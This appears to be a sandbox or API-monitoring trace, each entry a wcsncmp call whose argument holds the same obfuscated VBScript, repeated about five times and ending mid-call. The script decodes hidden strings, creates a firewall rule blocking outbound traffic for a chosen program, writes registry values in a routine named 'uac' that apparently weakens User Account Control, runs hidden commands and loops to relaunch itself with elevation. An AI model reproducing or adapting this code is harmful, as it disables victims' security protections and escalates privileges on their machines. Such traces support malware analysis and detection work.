(fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0222.979] wcsncmp (_String1="CTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.980] wcsncmp (_String1="TION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0222.980] wcsncmp (_String1="ION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 60 [0222.980] wcsncmp (_String1="ON_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0222.980] wcsncmp (_String1="N_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 